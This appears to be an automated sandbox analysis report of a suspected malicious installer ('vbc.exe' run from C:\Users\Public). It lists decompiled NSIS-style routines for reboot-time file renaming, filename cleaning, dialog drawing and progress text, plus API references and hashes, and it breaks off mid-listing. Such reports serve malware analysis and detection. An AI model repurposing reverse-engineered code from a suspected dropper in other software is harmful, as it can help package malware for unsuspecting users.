                                                				void* __esi;
                                                				long _t13;
                                                				long _t25;
                                                				char* _t32;
                                                				int _t38;
                                                				void* _t39;
                                                				intOrPtr* _t40;
                                                				long _t43;
                                                				WCHAR* _t45;
                                                				void* _t47;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t53;
                                                				void* _t54;
                                                
                                                				_t39 = __ecx;
                                                				lstrcpyW(0x426dc8, L"NUL");
                                                				_t45 =  *(_t53 + 0x18);
                                                				if(_t45 == 0) {
                                                					L3:
                                                					_t13 = GetShortPathNameW( *(_t53 + 0x1c), 0x4275c8, 0x400);
                                                					if(_t13 != 0 && _t13 <= 0x400) {
                                                						_t38 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
                                                						_t54 = _t53 + 0x10;
                                                						E00406234(_t38, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a250 + 0x128)));
                                                						_t13 = E00405DE7(0x4275c8, 0xc0000000, 4);
                                                						_t49 = _t13;
                                                						 *(_t54 + 0x18) = _t49;
                                                						if(_t49 != 0xffffffff) {
                                                							_t43 = GetFileSize(_t49, 0);
                                                							_t6 = _t38 + 0xa; // 0xa
                                                							_t47 = GlobalAlloc(0x40, _t43 + _t6);
                                                							if(_t47 == 0 || E00405E6A(_t49, _t47, _t43) == 0) {
                                                								L18:
                                                								return CloseHandle(_t49);
                                                							} else {
                                                								if(E00405D4C(_t39, _t47, "[Rename]\r\n") != 0) {
                                                									_t50 = E00405D4C(_t39, _t22 + 0xa, "\n[");
                                                									if(_t50 == 0) {
                                                										_t49 =  *(_t54 + 0x18);
                                                										L16:
                                                										_t25 = _t43;
                                                										L17:
                                                										E00405DA2(_t25 + _t47, 0x4269c8, _t38);
                                                										SetFilePointer(_t49, 0, 0, 0);
                                                										E00405E99(_t49, _t47, _t43 + _t38);
                                                										GlobalFree(_t47);
                                                										goto L18;
                                                									}
                                                									_t40 = _t47 + _t43;
                                                									_t32 = _t40 + _t38;
                                                									while(_t40 > _t50) {
                                                										 *_t32 =  *_t40;
                                                										_t32 = _t32 - 1;
                                                										_t40 = _t40 - 1;
                                                									}
                                                									_t25 = _t50 - _t47 + 1;
                                                									_t49 =  *(_t54 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
                                                								_t43 = _t43 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E00405DE7(_t45, 0, 1));
                                                					_t13 = GetShortPathNameW(_t45, 0x426dc8, 0x400);
                                                					if(_t13 != 0 && _t13 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t13;
                                                			}



















                                                0x00405f41
                                                0x00405f50
                                                0x00405f56
                                                0x00405f67
                                                0x00405f8f
                                                0x00405f9a
                                                0x00405f9e
                                                0x00405fbe
                                                0x00405fc5
                                                0x00405fcf
                                                0x00405fdc
                                                0x00405fe1
                                                0x00405fe6
                                                0x00405fea
                                                0x00405ff9
                                                0x00405ffb
                                                0x00406008
                                                0x0040600c
                                                0x004060a7
                                                0x00000000
                                                0x00406022
                                                0x0040602f
                                                0x00406053
                                                0x00406057
                                                0x00406076
                                                0x0040607a
                                                0x0040607a
                                                0x0040607c
                                                0x00406085
                                                0x00406090
                                                0x0040609b
                                                0x004060a1
                                                0x00000000
                                                0x004060a1
                                                0x00406059
                                                0x0040605c
                                                0x00406067
                                                0x00406063
                                                0x00406065
                                                0x00406066
                                                0x00406066
                                                0x0040606e
                                                0x00406070
                                                0x00000000
                                                0x00406070
                                                0x0040603a
                                                0x00406040
                                                0x00000000
                                                0x00406040
                                                0x0040600c
                                                0x00405fea
                                                0x00405f69
                                                0x00405f74
                                                0x00405f7d
                                                0x00405f81
                                                0x00000000
                                                0x00000000
                                                0x00405f81
                                                0x004060b2

                                                APIs
                                                • lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405F50
                                                • CloseHandle.KERNEL32(00000000), ref: 00405F74
                                                • GetShortPathNameW.KERNEL32 ref: 00405F7D
                                                  • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                  • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                • GetShortPathNameW.KERNEL32 ref: 00405F9A
                                                • wsprintfA.USER32 ref: 00405FB8
                                                • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                • CloseHandle.KERNEL32(00000000), ref: 004060A8
                                                  • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
                                                  • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]
                                                • API String ID: 222337774-899692902
                                                • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004064A6(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405C3D(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405BF3(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405DA2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x004064a8
                                                0x004064b1
                                                0x004064c8
                                                0x004064c8
                                                0x004064cf
                                                0x004064db
                                                0x004064db
                                                0x004064de
                                                0x004064e1
                                                0x004064e6
                                                0x004064e8
                                                0x004064f1
                                                0x004064f5
                                                0x00406512
                                                0x0040651a
                                                0x0040651a
                                                0x0040651f
                                                0x00406521
                                                0x00406524
                                                0x00406529
                                                0x0040652a
                                                0x0040652e
                                                0x0040652e
                                                0x0040652f
                                                0x00406536
                                                0x00406538
                                                0x0040653f
                                                0x00000000
                                                0x00000000
                                                0x00406547
                                                0x0040654d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040654d
                                                0x00406552

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1374994687
                                                • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040433D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t35;
                                                				long _t37;
                                                				void* _t40;
                                                				long* _t49;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L15:
                                                					return 0;
                                                				}
                                                				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t49 == 0) {
                                                					goto L15;
                                                				}
                                                				_t35 =  *_t49;
                                                				if((_t49[5] & 0x00000002) != 0) {
                                                					_t35 = GetSysColor(_t35);
                                                				}
                                                				if((_t49[5] & 0x00000001) != 0) {
                                                					SetTextColor(_a8, _t35);
                                                				}
                                                				SetBkMode(_a8, _t49[4]);
                                                				_t37 = _t49[1];
                                                				_v16.lbColor = _t37;
                                                				if((_t49[5] & 0x00000008) != 0) {
                                                					_t37 = GetSysColor(_t37);
                                                					_v16.lbColor = _t37;
                                                				}
                                                				if((_t49[5] & 0x00000004) != 0) {
                                                					SetBkColor(_a8, _t37);
                                                				}
                                                				if((_t49[5] & 0x00000010) != 0) {
                                                					_v16.lbStyle = _t49[2];
                                                					_t40 = _t49[3];
                                                					if(_t40 != 0) {
                                                						DeleteObject(_t40);
                                                					}
                                                					_t49[3] = CreateBrushIndirect( &_v16);
                                                				}
                                                				return _t49[3];
                                                			}








                                                0x0040434f
                                                0x004043e3
                                                0x00000000
                                                0x004043e3
                                                0x00404360
                                                0x00404364
                                                0x00000000
                                                0x00000000
                                                0x0040436a
                                                0x00404373
                                                0x00404376
                                                0x00404376
                                                0x0040437c
                                                0x00404382
                                                0x00404382
                                                0x0040438e
                                                0x00404394
                                                0x0040439b
                                                0x0040439e
                                                0x004043a1
                                                0x004043a3
                                                0x004043a3
                                                0x004043ab
                                                0x004043b1
                                                0x004043b1
                                                0x004043bb
                                                0x004043c0
                                                0x004043c3
                                                0x004043c8
                                                0x004043cb
                                                0x004043cb
                                                0x004043db
                                                0x004043db
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405371(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x429224;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x42a2f4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E00406234(_t38, 0, 0x422708, 0x422708, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x422708);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x429208, 0x422708);
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x422708;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x422708[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x422708, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x00405377
                                                0x00405381
                                                0x00405386
                                                0x0040538c
                                                0x00405397
                                                0x0040539a
                                                0x0040539d
                                                0x004053a3
                                                0x004053a3
                                                0x004053a9
                                                0x004053b1
                                                0x004053b4
                                                0x004053d1
                                                0x004053d5
                                                0x004053de
                                                0x004053de
                                                0x004053e8
                                                0x004053f1
                                                0x004053fd
                                                0x00405404
                                                0x00405408
                                                0x0040540b
                                                0x0040541e
                                                0x0040542c
                                                0x0040542c
                                                0x00405430
                                                0x00405432
                                                0x00405435
                                                0x00000000
                                                0x00405435
                                                0x004053b6
                                                0x004053be
                                                0x004053c6
                                                0x004053cc
                                                0x00000000
                                                0x004053cc
                                                0x004053c6
                                                0x004053b4
                                                0x00405441

                                                APIs
                                                • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                • lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                • lstrcatW.KERNEL32 ref: 004053CC
                                                • SetWindowTextW.USER32 ref: 004053DE
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402E33(intOrPtr _a4) {
                                                				short _v132;
                                                				long _t6;
                                                				struct HWND__* _t7;
                                                				struct HWND__* _t15;
                                                
                                                				if(_a4 != 0) {
                                                					_t15 =  *0x418edc; // 0x0
                                                					if(_t15 != 0) {
                                                						_t15 = DestroyWindow(_t15);
                                                					}
                                                					 *0x418edc = 0;
                                                					return _t15;
                                                				}
                                                				__eflags =  *0x418edc; // 0x0
                                                				if(__eflags != 0) {
                                                					return E00406628(0);
                                                				}
                                                				_t6 = GetTickCount();
                                                				__eflags = _t6 -  *0x42a24c;
                                                				if(_t6 >  *0x42a24c) {
                                                					__eflags =  *0x42a248;
                                                					if( *0x42a248 == 0) {
                                                						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402D98, 0);
                                                						 *0x418edc = _t7;
                                                						return ShowWindow(_t7, 5);
                                                					}
                                                					__eflags =  *0x42a2f4 & 0x00000001;
                                                					if(( *0x42a2f4 & 0x00000001) != 0) {
                                                						wsprintfW( &_v132, L"... %d%%", E00402E17());
                                                						return E00405371(0,  &_v132);
                                                					}
                                                				}
                                                				return _t6;
                                                			}







                                                0x00402e42
                                                0x00402e44
                                                0x00402e4b
                                                0x00402e4e
                                                0x00402e4e
                                                0x00402e54
                                                0x00000000
                                                0x00402e54
                                                0x00402e5c
                                                0x00402e62
                                                0x00000000
                                                0x00402e65
                                                0x00402e6c
                                                0x00402e72
                                                0x00402e78
                                                0x00402e7a
                                                0x00402e80
                                                0x00402ebe
                                                0x00402ec7
                                                0x00000000
                                                0x00402ecc
                                                0x00402e82
                                                0x00402e89
                                                0x00402e9a
                                                0x00000000
                                                0x00402ea8
                                                0x00402e89
                                                0x00402ed4

                                                APIs
                                                • DestroyWindow.USER32 ref: 00402E4E
                                                • GetTickCount.KERNEL32(00000000), ref: 00402E6C
                                                • wsprintfW.USER32 ref: 00402E9A
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                • CreateDialogParamW.USER32 ref: 00402EBE
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                  • Part of subcall function 00402E17: MulDiv.KERNEL32 ref: 00402E2C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
                                                • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                • Opcode Fuzzy Hash: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
                                                • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404C3B(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404c49
                                                0x00404c56
                                                0x00404c5c
                                                0x00404c9a
                                                0x00404c9a
                                                0x00404ca9
                                                0x00404cb0
                                                0x00000000
                                                0x00404cb2
                                                0x00404c5e
                                                0x00404c6d
                                                0x00404c75
                                                0x00404c78
                                                0x00404c8a
                                                0x00404c90
                                                0x00404c97
                                                0x00000000
                                                0x00404c97
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                • GetMessagePos.USER32 ref: 00404C5E
                                                • ScreenToClient.USER32(?,?), ref: 00404C78
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402D98(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				void* _t11;
                                                				WCHAR* _t19;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t11 = E00402E17();
                                                					_t19 = L"unpacking data: %d%%";
                                                					if( *0x42a250 == 0) {
                                                						_t19 = L"verifying installer: %d%%";
                                                					}
                                                					wsprintfW( &_v132, _t19, _t11);
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402da8
                                                0x00402db6
